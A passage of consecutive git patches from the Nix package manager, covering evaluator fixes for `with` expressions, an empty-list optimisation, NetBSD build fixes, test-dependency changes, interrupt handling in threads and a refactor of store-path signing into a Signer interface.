+ +Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: + +``` +nix-repl> with 1; a +error: + … + + at «none»:0: (source not available) + + error: value is an integer while a set was expected +``` + +Now position information is preserved and reported as with most other errors: + +``` +nix-repl> with 1; a +error: + … while evaluating the first subexpression of a with expression + at «string»:1:1: + 1| with 1; a + | ^ + + error: value is an integer while a set was expected +``` diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 97d709ff4..dea91ba63 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -112,7 +112,7 @@ NixRepl::NixRepl(const SearchPath & searchPath, nix::ref store, refstaticBaseEnv.get())) + , staticEnv(new StaticEnv(nullptr, state->staticBaseEnv.get())) , historyFile(getDataDir() + "/nix/repl-history") { } diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 52aa75b5f..f7710f819 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -73,8 +73,6 @@ Env & EvalState::allocEnv(size_t size) #endif env = (Env *) allocBytes(sizeof(Env) + size * sizeof(Value *)); - env->type = Env::Plain; - /* We assume that env->values has been cleared by the allocator; maybeThunk() and lookupVar fromWith expect this. 
*/ return *env; diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 810843995..ee1a87d9a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -543,7 +543,7 @@ EvalState::EvalState( , env1AllocCache(std::allocate_shared(traceable_allocator(), nullptr)) #endif , baseEnv(allocEnv(128)) - , staticBaseEnv{std::make_shared(false, nullptr)} + , staticBaseEnv{std::make_shared(nullptr, nullptr)} { corepkgsFS->setPathDisplay(""); internalFS->setPathDisplay("«nix-internal»", ""); @@ -781,7 +781,7 @@ void printStaticEnvBindings(const SymbolTable & st, const StaticEnv & se) // just for the current level of Env, not the whole chain. void printWithBindings(const SymbolTable & st, const Env & env) { - if (env.type == Env::HasWithAttrs) { + if (!env.values[0]->isThunk()) { std::cout << "with: "; std::cout << ANSI_MAGENTA; Bindings::iterator j = env.values[0]->attrs->begin(); @@ -835,7 +835,7 @@ void mapStaticEnvBindings(const SymbolTable & st, const StaticEnv & se, const En if (env.up && se.up) { mapStaticEnvBindings(st, *se.up, *env.up, vm); - if (env.type == Env::HasWithAttrs) { + if (!env.values[0]->isThunk()) { // add 'with' bindings. Bindings::iterator j = env.values[0]->attrs->begin(); while (j != env.values[0]->attrs->end()) { @@ -973,22 +973,23 @@ inline Value * EvalState::lookupVar(Env * env, const ExprVar & var, bool noEval) if (!var.fromWith) return env->values[var.displ]; + // This early exit defeats the `maybeThunk` optimization for variables from `with`, + // The added complexity of handling this appears to be similarly in cost, or + // the cases where applicable were insignificant in the first place. 
+ if (noEval) return nullptr; + + auto * fromWith = var.fromWith; while (1) { - if (env->type == Env::HasWithExpr) { - if (noEval) return 0; - Value * v = allocValue(); - evalAttrs(*env->up, (Expr *) env->values[0], *v, noPos, ""); - env->values[0] = v; - env->type = Env::HasWithAttrs; - } + forceAttrs(*env->values[0], fromWith->pos, "while evaluating the first subexpression of a with expression"); Bindings::iterator j = env->values[0]->attrs->find(var.name); if (j != env->values[0]->attrs->end()) { if (countCalls) attrSelects[j->pos]++; return j->value; } - if (!env->prevWith) + if (!fromWith->parentWith) error("undefined variable '%1%'", symbols[var.name]).atPos(var.pos).withFrame(*env, var).debugThrow(); - for (size_t l = env->prevWith; l; --l, env = env->up) ; + for (size_t l = fromWith->prevWith; l; --l, env = env->up) ; + fromWith = fromWith->parentWith; } } @@ -1816,9 +1817,7 @@ void ExprWith::eval(EvalState & state, Env & env, Value & v) { Env & env2(state.allocEnv(1)); env2.up = &env; - env2.prevWith = prevWith; - env2.type = Env::HasWithExpr; - env2.values[0] = (Value *) attrs; + env2.values[0] = attrs->maybeThunk(state, env); body->eval(state, env2, v); } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index da2d256db..db606ebae 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -116,11 +116,6 @@ struct Constant struct Env { Env * up; - /** - * Number of of levels up to next `with` environment - */ - unsigned short prevWith:14; - enum { Plain = 0, HasWithExpr, HasWithAttrs } type:2; Value * values[0]; }; diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 84860b30f..ede070cff 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -333,6 +333,8 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, env)); + fromWith = nullptr; + /* Check whether the variable appears in the environment. If so, set its level and displacement. 
*/ const StaticEnv * curEnv; @@ -344,7 +346,6 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & } else { auto i = curEnv->find(name); if (i != curEnv->vars.end()) { - fromWith = false; this->level = level; displ = i->second; return; @@ -360,7 +361,8 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & .msg = hintfmt("undefined variable '%1%'", es.symbols[name]), .errPos = es.positions[pos] }); - fromWith = true; + for (auto * e = env.get(); e && !fromWith; e = e->up) + fromWith = e->isWith; this->level = withLevel; } @@ -393,7 +395,7 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr es.exprEnvs.insert(std::make_pair(this, env)); if (recursive) { - auto newEnv = std::make_shared(false, env.get(), recursive ? attrs.size() : 0); + auto newEnv = std::make_shared(nullptr, env.get(), recursive ? attrs.size() : 0); Displacement displ = 0; for (auto & i : attrs) @@ -435,7 +437,7 @@ void ExprLambda::bindVars(EvalState & es, const std::shared_ptr es.exprEnvs.insert(std::make_pair(this, env)); auto newEnv = std::make_shared( - false, env.get(), + nullptr, env.get(), (hasFormals() ? formals->formals.size() : 0) + (!arg ? 0 : 1)); @@ -471,7 +473,7 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr & if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, env)); - auto newEnv = std::make_shared(false, env.get(), attrs->attrs.size()); + auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); Displacement displ = 0; for (auto & i : attrs->attrs) @@ -490,6 +492,10 @@ void ExprWith::bindVars(EvalState & es, const std::shared_ptr & if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, env)); + parentWith = nullptr; + for (auto * e = env.get(); e && !parentWith; e = e->up) + parentWith = e->isWith; + /* Does this `with' have an enclosing `with'? If so, record its level so that `lookupVar' can look up variables in the previous `with' if this one doesn't contain the desired attribute. 
*/ @@ -506,7 +512,7 @@ void ExprWith::bindVars(EvalState & es, const std::shared_ptr & es.exprEnvs.insert(std::make_pair(this, env)); attrs->bindVars(es, env); - auto newEnv = std::make_shared(true, env.get()); + auto newEnv = std::make_shared(this, env.get()); body->bindVars(es, newEnv); } diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 1e57fec7a..e50a157ee 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -138,6 +138,7 @@ std::ostream & operator << (std::ostream & str, const Pos & pos); struct Env; struct Value; class EvalState; +struct ExprWith; struct StaticEnv; @@ -226,8 +227,11 @@ struct ExprVar : Expr Symbol name; /* Whether the variable comes from an environment (e.g. a rec, let - or function argument) or from a "with". */ - bool fromWith; + or function argument) or from a "with". + + `nullptr`: Not from a `with`. + Valid pointer: the nearest, innermost `with` expression to query first. */ + ExprWith * fromWith; /* In the former case, the value is obtained by going `level` levels up from the current environment and getting the @@ -385,6 +389,7 @@ struct ExprWith : Expr PosIdx pos; Expr * attrs, * body; size_t prevWith; + ExprWith * parentWith; ExprWith(const PosIdx & pos, Expr * attrs, Expr * body) : pos(pos), attrs(attrs), body(body) { }; PosIdx getPos() const override { return pos; } COMMON_METHODS @@ -478,14 +483,14 @@ extern ExprBlackHole eBlackHole; runtime. */ struct StaticEnv { - bool isWith; + ExprWith * isWith; const StaticEnv * up; // Note: these must be in sorted order. 
typedef std::vector> Vars; Vars vars; - StaticEnv(bool isWith, const StaticEnv * up, size_t expectedSize = 0) : isWith(isWith), up(up) { + StaticEnv(ExprWith * isWith, const StaticEnv * up, size_t expectedSize = 0) : isWith(isWith), up(up) { vars.reserve(expectedSize); }; diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index a1502da45..924de3184 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -214,7 +214,7 @@ static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * v Env * env = &state.allocEnv(vScope->attrs->size()); env->up = &state.baseEnv; - auto staticEnv = std::make_shared(false, state.staticBaseEnv.get(), vScope->attrs->size()); + auto staticEnv = std::make_shared(nullptr, state.staticBaseEnv.get(), vScope->attrs->size()); unsigned int displ = 0; for (auto & attr : *vScope->attrs) { From 3f796514b37a1e723a395fce8271428410e93f5f Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 2 Jan 2024 12:39:16 +0100 Subject: [PATCH 186/654] Optimize empty list constants MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This avoids a Value allocation for empty list constants. During a `nix search nixpkgs`, about 82% of all thunked lists are empty, so this removes about 3 million Value allocations. 
Performance comparison on `nix search github:NixOS/nixpkgs/e1fa12d4f6c6fe19ccb59cac54b5b3f25e160870 --no-eval-cache`: maximum RSS: median = 3845432.0000 mean = 3845432.0000 stddev = 0.0000 min = 3845432.0000 max = 3845432.0000 [rejected?, p=0.00000, Δ=-70084.00000±0.00000] soft page faults: median = 965395.0000 mean = 965394.6667 stddev = 1.1181 min = 965392.0000 max = 965396.0000 [rejected?, p=0.00000, Δ=-17929.77778±38.59610] system CPU time: median = 1.8029 mean = 1.7702 stddev = 0.0621 min = 1.6749 max = 1.8417 [rejected, p=0.00064, Δ=-0.12873±0.09905] user CPU time: median = 14.1022 mean = 14.0633 stddev = 0.1869 min = 13.8118 max = 14.3190 [not rejected, p=0.03006, Δ=-0.18248±0.24928] elapsed time: median = 15.8205 mean = 15.8618 stddev = 0.2312 min = 15.5033 max = 16.1670 [not rejected, p=0.00558, Δ=-0.28963±0.29434] --- src/libexpr/eval.cc | 11 +++++++++++ src/libexpr/eval.hh | 3 +++ src/libexpr/nixexpr.hh | 1 + 3 files changed, 15 insertions(+) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 810843995..494b8338f 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -554,6 +554,8 @@ EvalState::EvalState( static_assert(sizeof(Env) <= 16, "environment must be <= 16 bytes"); + vEmptyList.mkList(0); + /* Initialise the Nix expression search path. */ if (!evalSettings.pureEval) { for (auto & i : _searchPath.elements) @@ -1384,6 +1386,15 @@ void ExprList::eval(EvalState & state, Env & env, Value & v) } +Value * ExprList::maybeThunk(EvalState & state, Env & env) +{ + if (elems.empty()) { + return &state.vEmptyList; + } + return Expr::maybeThunk(state, env); +} + + void ExprVar::eval(EvalState & state, Env & env, Value & v) { Value * v2 = state.lookupVar(&env, *this, false); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index da2d256db..bf85b50c8 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -305,6 +305,9 @@ public: return *errorBuilder; } + /* Empty list constant. 
*/ + Value vEmptyList; + private: /* Cache for calls to addToStore(); maps source paths to the store diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 1e57fec7a..55e930758 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -299,6 +299,7 @@ struct ExprList : Expr std::vector elems; ExprList() { }; COMMON_METHODS + Value * maybeThunk(EvalState & state, Env & env) override; PosIdx getPos() const override { From 2b20f36f9515882589975d14a94ba1fd2b5c513a Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 2 Jan 2024 12:33:51 -0500 Subject: [PATCH 187/654] Fix NetBSD build There was still a mistake after my earlier a7115a47ef0d83ea81b494f6bc5b11d8286e0672 and e13fc0bbdb1e1eefeb33ff4d18310958041b1ad5. This finally gets it right. --- configure.ac | 7 ++++++- src/libstore/globals.hh | 2 ++ src/libstore/posix-fs-canonicalise.cc | 4 ++-- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/configure.ac b/configure.ac index 1bc4f17b0..b97e25bbd 100644 --- a/configure.ac +++ b/configure.ac @@ -308,7 +308,12 @@ AC_SUBST(HAVE_SECCOMP, [$have_seccomp]) # Optional dependencies for better normalizing file system data AC_CHECK_HEADERS([sys/xattr.h]) -AC_CHECK_FUNCS([llistxattr lremovexattr]) +AS_IF([test "$ac_cv_header_sys_xattr_h" = "yes"],[ + AC_CHECK_FUNCS([llistxattr lremovexattr]) + AS_IF([test "$ac_cv_func_llistxattr" = "yes" && test "$ac_cv_func_lremovexattr" = "yes"],[ + AC_DEFINE([HAVE_ACL_SUPPORT], [1], [Define if we can manipulate file system Access Control Lists]) + ]) +]) # Look for aws-cpp-sdk-s3. AC_LANG_PUSH(C++) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index b35dc37a1..cf34ae354 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -946,7 +946,9 @@ public: may be useful in certain scenarios (e.g. to spin up containers or set up userspace network interfaces in tests). 
)"}; +#endif +#if HAVE_ACL_SUPPORT Setting ignoredAcls{ this, {"security.selinux", "system.nfs4_acl", "security.csm"}, "ignored-acls", R"( diff --git a/src/libstore/posix-fs-canonicalise.cc b/src/libstore/posix-fs-canonicalise.cc index 5edda0157..8b29e90d4 100644 --- a/src/libstore/posix-fs-canonicalise.cc +++ b/src/libstore/posix-fs-canonicalise.cc @@ -1,4 +1,4 @@ -#if HAVE_SYS_XATTR_H +#if HAVE_ACL_SUPPORT # include #endif @@ -78,7 +78,7 @@ static void canonicalisePathMetaData_( if (!(S_ISREG(st.st_mode) || S_ISDIR(st.st_mode) || S_ISLNK(st.st_mode))) throw Error("file '%1%' has an unsupported type", path); -#if HAVE_SYS_XATTR_H && HAVE_LLISTXATTR && HAVE_LREMOVEXATTR +#if HAVE_ACL_SUPPORT /* Remove extended attributes / ACLs. */ ssize_t eaSize = llistxattr(path.c_str(), nullptr, 0); From 86e924443722a04f7d458594e3332ffaa73edb1d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 2 Jan 2024 12:41:53 -0500 Subject: [PATCH 188/654] Fix `buildNoTest` `checkInputs` is not right for this because we don't just need these deps when `doTest`, we also need them when `installUnitTests`. 
--- package.nix | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/package.nix b/package.nix index b5ff45083..56276ecc4 100644 --- a/package.nix +++ b/package.nix @@ -214,6 +214,9 @@ in { ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ editline lowdown + ] ++ lib.optionals buildUnitTests [ + gtest + rapidcheck ] ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid # There have been issues building these dependencies @@ -232,11 +235,6 @@ in { dontBuild = !attrs.doBuild; doCheck = attrs.doCheck; - checkInputs = [ - gtest - rapidcheck - ]; - nativeCheckInputs = [ git mercurial From 7b8af5f916a73aa5927b103ff712280023cea840 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 2 Jan 2024 12:50:48 -0500 Subject: [PATCH 189/654] `buildNoTests`: Restore intent The thing we wanted to test was that building Nix without building or running tests, and without depending on libraries only needed by tests, works. But since 6c8f4ef3502aa214557541ec00538e41aeced6e3, we can also install unit tests, and during the conversion to using `package.nix` this started happening more often (they go to a separate output though, so this should be fine). This adds more `... = false` to restore the original intent: don't run unit test or functional tests, and don't install unit tests. --- flake.nix | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/flake.nix b/flake.nix index a8fc105e8..9217de9af 100644 --- a/flake.nix +++ b/flake.nix @@ -234,11 +234,11 @@ buildNoGc = forAllSystems (system: self.packages.${system}.nix.overrideAttrs (a: { configureFlags = (a.configureFlags or []) ++ ["--enable-gc=no"];})); buildNoTests = forAllSystems (system: - self.packages.${system}.nix.overrideAttrs (a: { - doCheck = - assert ! a?dontCheck; - false; - }) + self.packages.${system}.nix.override { + doCheck = false; + doInstallCheck = false; + installUnitTests = false; + } ); # Perl bindings for various platforms. 
From 484881f3021856cd0d0c0cb42d4473b3c7ea0051 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 3 Jan 2024 10:23:27 +0100 Subject: [PATCH 190/654] Move empty list constant --- src/libexpr/eval.hh | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index bf85b50c8..e2180f00d 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -218,6 +218,11 @@ public: Bindings emptyBindings; + /** + * Empty list constant. + */ + Value vEmptyList; + /** * The accessor for the root filesystem. */ @@ -305,9 +310,6 @@ public: return *errorBuilder; } - /* Empty list constant. */ - Value vEmptyList; - private: /* Cache for calls to addToStore(); maps source paths to the store From 24e70489e59f9ab75310382dc59df09796ea8df4 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 3 Jan 2024 19:14:50 +0100 Subject: [PATCH 191/654] withFramedSink(): Receive interrupts on the stderr thread Otherwise Nix deadlocks when Ctrl-C is received in withFramedSink(): the parent thread will wait forever for the stderr thread to shut down. Fixes the hang reported in https://github.com/NixOS/nix/issues/7245#issuecomment-1770560923. --- src/libstore/remote-store.cc | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index f0df646ca..078b9fe00 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -16,6 +16,8 @@ #include "logging.hh" #include "callback.hh" #include "filetransfer.hh" +#include "signals.hh" + #include namespace nix { @@ -1066,6 +1068,7 @@ void RemoteStore::ConnectionHandle::withFramedSink(std::function Date: Wed, 3 Jan 2024 19:30:02 +0100 Subject: [PATCH 192/654] Make some more threads receive interrupts Shouldn't hurt to do this. In particular, this should speed up shutting down the PathSubstitutionGoal thread if it's copying from a remote store. 
--- src/libstore/build/substitution-goal.cc | 3 +++ src/libutil/thread-pool.cc | 2 ++ 2 files changed, 5 insertions(+) diff --git a/src/libstore/build/substitution-goal.cc b/src/libstore/build/substitution-goal.cc index 93867007d..c7e8e2825 100644 --- a/src/libstore/build/substitution-goal.cc +++ b/src/libstore/build/substitution-goal.cc @@ -2,6 +2,7 @@ #include "substitution-goal.hh" #include "nar-info.hh" #include "finally.hh" +#include "signals.hh" namespace nix { @@ -217,6 +218,8 @@ void PathSubstitutionGoal::tryToRun() thr = std::thread([this]() { try { + ReceiveInterrupts receiveInterrupts; + /* Wake up the worker loop when we're done. */ Finally updateStats([this]() { outPipe.writeSide.close(); }); diff --git a/src/libutil/thread-pool.cc b/src/libutil/thread-pool.cc index c5e735617..9a7dfee56 100644 --- a/src/libutil/thread-pool.cc +++ b/src/libutil/thread-pool.cc @@ -79,6 +79,8 @@ void ThreadPool::process() void ThreadPool::doWork(bool mainThread) { + ReceiveInterrupts receiveInterrupts; + if (!mainThread) interruptCheck = [&]() { return (bool) quit; }; From 12bb8cdd381156456a712e4a5a8af3b6bc852eab Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 3 Jan 2024 15:02:20 -0500 Subject: [PATCH 193/654] Signer infrastructure: Prep for #9076 This sets up infrastructure in libutil to allow for signing other than by a secret key in memory. #9076 uses this to implement remote signing. (Split from that PR to allow reviewing in smaller chunks.) 
Co-Authored-By: Raito Bezarius --- perl/lib/Nix/Store.xs | 1 - src/libstore/binary-cache-store.cc | 5 +- src/libstore/binary-cache-store.hh | 5 +- src/libstore/globals.cc | 5 -- src/libstore/keys.cc | 31 ++++++++++ src/libstore/keys.hh | 10 +++ src/libstore/local-store.cc | 7 ++- src/libstore/local.mk | 2 +- src/libstore/path-info.cc | 4 +- src/libstore/path-info.hh | 4 +- src/libstore/path.cc | 6 +- src/libstore/realisation.cc | 5 +- src/libstore/realisation.hh | 4 +- src/libstore/store-api.cc | 2 +- src/libutil/hash.cc | 9 +++ src/libutil/hash.hh | 6 +- src/libutil/local.mk | 7 ++- .../signature/local-keys.cc} | 54 +++++++--------- .../signature/local-keys.hh} | 42 +++++++++++-- src/libutil/signature/signer.cc | 23 +++++++ src/libutil/signature/signer.hh | 61 +++++++++++++++++++ src/libutil/util.cc | 4 ++ src/nix/sigs.cc | 5 +- src/nix/verify.cc | 1 + 24 files changed, 233 insertions(+), 70 deletions(-) create mode 100644 src/libstore/keys.cc create mode 100644 src/libstore/keys.hh rename src/{libstore/crypto.cc => libutil/signature/local-keys.cc} (64%) rename src/{libstore/crypto.hh => libutil/signature/local-keys.hh} (51%) create mode 100644 src/libutil/signature/signer.cc create mode 100644 src/libutil/signature/signer.hh diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 4964b8a34..423c01cf7 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -12,7 +12,6 @@ #include "realisation.hh" #include "globals.hh" #include "store-api.hh" -#include "crypto.hh" #include "posix-source-accessor.hh" #include diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index 8a3052433..ea1279e2e 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -28,7 +28,8 @@ BinaryCacheStore::BinaryCacheStore(const Params & params) , Store(params) { if (secretKeyFile != "") - secretKey = std::unique_ptr(new SecretKey(readFile(secretKeyFile))); + signer = std::make_unique( + SecretKey { 
readFile(secretKeyFile) }); StringSink sink; sink << narVersionMagic1; @@ -274,7 +275,7 @@ ref BinaryCacheStore::addToStoreCommon( stats.narWriteCompressionTimeMs += duration; /* Atomically write the NAR info file.*/ - if (secretKey) narInfo->sign(*this, *secretKey); + if (signer) narInfo->sign(*this, *signer); writeNarInfo(narInfo); diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index 98e43ee6a..00ab73905 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -1,7 +1,7 @@ #pragma once ///@file -#include "crypto.hh" +#include "signature/local-keys.hh" #include "store-api.hh" #include "log-store.hh" @@ -57,8 +57,7 @@ class BinaryCacheStore : public virtual BinaryCacheStoreConfig, { private: - - std::unique_ptr secretKey; + std::unique_ptr signer; protected: diff --git a/src/libstore/globals.cc b/src/libstore/globals.cc index f401d076d..50584e06c 100644 --- a/src/libstore/globals.cc +++ b/src/libstore/globals.cc @@ -15,8 +15,6 @@ #include -#include - #ifdef __GLIBC__ # include # include @@ -409,9 +407,6 @@ void initLibStore() { initLibUtil(); - if (sodium_init() == -1) - throw Error("could not initialise libsodium"); - loadConfFile(); preloadNSS(); diff --git a/src/libstore/keys.cc b/src/libstore/keys.cc new file mode 100644 index 000000000..2cc50970f --- /dev/null +++ b/src/libstore/keys.cc @@ -0,0 +1,31 @@ +#include "file-system.hh" +#include "globals.hh" +#include "keys.hh" + +namespace nix { + +PublicKeys getDefaultPublicKeys() +{ + PublicKeys publicKeys; + + // FIXME: filter duplicates + + for (auto s : settings.trustedPublicKeys.get()) { + PublicKey key(s); + publicKeys.emplace(key.name, key); + } + + for (auto secretKeyFile : settings.secretKeyFiles.get()) { + try { + SecretKey secretKey(readFile(secretKeyFile)); + publicKeys.emplace(secretKey.name, secretKey.toPublicKey()); + } catch (SysError & e) { + /* Ignore unreadable key files. That's normal in a + multi-user installation. 
*/ + } + } + + return publicKeys; +} + +} diff --git a/src/libstore/keys.hh b/src/libstore/keys.hh new file mode 100644 index 000000000..3da19493f --- /dev/null +++ b/src/libstore/keys.hh @@ -0,0 +1,10 @@ +#pragma once +///@file + +#include "signature/local-keys.hh" + +namespace nix { + +PublicKeys getDefaultPublicKeys(); + +} diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 63e90ea1e..0f3c37c8a 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -14,6 +14,7 @@ #include "signals.hh" #include "posix-fs-canonicalise.hh" #include "posix-source-accessor.hh" +#include "keys.hh" #include #include @@ -1578,7 +1579,8 @@ void LocalStore::signRealisation(Realisation & realisation) for (auto & secretKeyFile : secretKeyFiles.get()) { SecretKey secretKey(readFile(secretKeyFile)); - realisation.sign(secretKey); + LocalSigner signer(std::move(secretKey)); + realisation.sign(signer); } } @@ -1590,7 +1592,8 @@ void LocalStore::signPathInfo(ValidPathInfo & info) for (auto & secretKeyFile : secretKeyFiles.get()) { SecretKey secretKey(readFile(secretKeyFile)); - info.sign(*this, secretKey); + LocalSigner signer(std::move(secretKey)); + info.sign(*this, signer); } } diff --git a/src/libstore/local.mk b/src/libstore/local.mk index 68ccdc409..675976314 100644 --- a/src/libstore/local.mk +++ b/src/libstore/local.mk @@ -8,7 +8,7 @@ libstore_SOURCES := $(wildcard $(d)/*.cc $(d)/builtins/*.cc $(d)/build/*.cc) libstore_LIBS = libutil -libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) $(SODIUM_LIBS) -pthread +libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) -pthread ifdef HOST_LINUX libstore_LDFLAGS += -ldl endif diff --git a/src/libstore/path-info.cc b/src/libstore/path-info.cc index f58e31bfd..d82ccd0c9 100644 --- a/src/libstore/path-info.cc +++ b/src/libstore/path-info.cc @@ -38,9 +38,9 @@ std::string ValidPathInfo::fingerprint(const Store & store) const } -void ValidPathInfo::sign(const Store & store, const SecretKey & secretKey) 
+void ValidPathInfo::sign(const Store & store, const Signer & signer) { - sigs.insert(secretKey.signDetached(fingerprint(store))); + sigs.insert(signer.signDetached(fingerprint(store))); } std::optional ValidPathInfo::contentAddressWithReferences() const diff --git a/src/libstore/path-info.hh b/src/libstore/path-info.hh index 077abc7e1..b6dc0855d 100644 --- a/src/libstore/path-info.hh +++ b/src/libstore/path-info.hh @@ -1,7 +1,7 @@ #pragma once ///@file -#include "crypto.hh" +#include "signature/signer.hh" #include "path.hh" #include "hash.hh" #include "content-address.hh" @@ -107,7 +107,7 @@ struct ValidPathInfo : UnkeyedValidPathInfo { */ std::string fingerprint(const Store & store) const; - void sign(const Store & store, const SecretKey & secretKey); + void sign(const Store & store, const Signer & signer); /** * @return The `ContentAddressWithReferences` that determines the diff --git a/src/libstore/path.cc b/src/libstore/path.cc index 1afd10af7..a15a78545 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -1,7 +1,5 @@ #include "store-dir-config.hh" -#include - namespace nix { static void checkName(std::string_view path, std::string_view name) @@ -49,9 +47,7 @@ StorePath StorePath::dummy("ffffffffffffffffffffffffffffffff-x"); StorePath StorePath::random(std::string_view name) { - Hash hash(HashAlgorithm::SHA1); - randombytes_buf(hash.hash, hash.hashSize); - return StorePath(hash, name); + return StorePath(Hash::random(HashAlgorithm::SHA1), name); } StorePath StoreDirConfig::parseStorePath(std::string_view path) const diff --git a/src/libstore/realisation.cc b/src/libstore/realisation.cc index 93ddb5b20..86bfdd1a8 100644 --- a/src/libstore/realisation.cc +++ b/src/libstore/realisation.cc @@ -1,6 +1,7 @@ #include "realisation.hh" #include "store-api.hh" #include "closure.hh" +#include "signature/local-keys.hh" #include namespace nix { @@ -113,9 +114,9 @@ std::string Realisation::fingerprint() const return serialized.dump(); } -void 
Realisation::sign(const SecretKey & secretKey) +void Realisation::sign(const Signer &signer) { - signatures.insert(secretKey.signDetached(fingerprint())); + signatures.insert(signer.signDetached(fingerprint())); } bool Realisation::checkSignature(const PublicKeys & publicKeys, const std::string & sig) const diff --git a/src/libstore/realisation.hh b/src/libstore/realisation.hh index 4ba2123d8..ddb4af770 100644 --- a/src/libstore/realisation.hh +++ b/src/libstore/realisation.hh @@ -8,7 +8,7 @@ #include "derived-path.hh" #include #include "comparator.hh" -#include "crypto.hh" +#include "signature/signer.hh" namespace nix { @@ -64,7 +64,7 @@ struct Realisation { static Realisation fromJSON(const nlohmann::json& json, const std::string& whence); std::string fingerprint() const; - void sign(const SecretKey &); + void sign(const Signer &); bool checkSignature(const PublicKeys & publicKeys, const std::string & sig) const; size_t checkSignatures(const PublicKeys & publicKeys) const; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index c2516afb5..c48bfc248 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -1,4 +1,4 @@ -#include "crypto.hh" +#include "signature/local-keys.hh" #include "source-accessor.hh" #include "globals.hh" #include "derived-path.hh" diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 502afbda2..d067da969 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -14,6 +14,8 @@ #include #include +#include + namespace nix { static size_t regularHashSize(HashAlgorithm type) { @@ -261,6 +263,13 @@ Hash::Hash(std::string_view rest, HashAlgorithm algo, bool isSRI) throw BadHash("hash '%s' has wrong length for hash algorithm '%s'", rest, printHashAlgo(this->algo)); } +Hash Hash::random(HashAlgorithm algo) +{ + Hash hash(algo); + randombytes_buf(hash.hash, hash.hashSize); + return hash; +} + Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha) { if (hashStr.empty()) { diff --git 
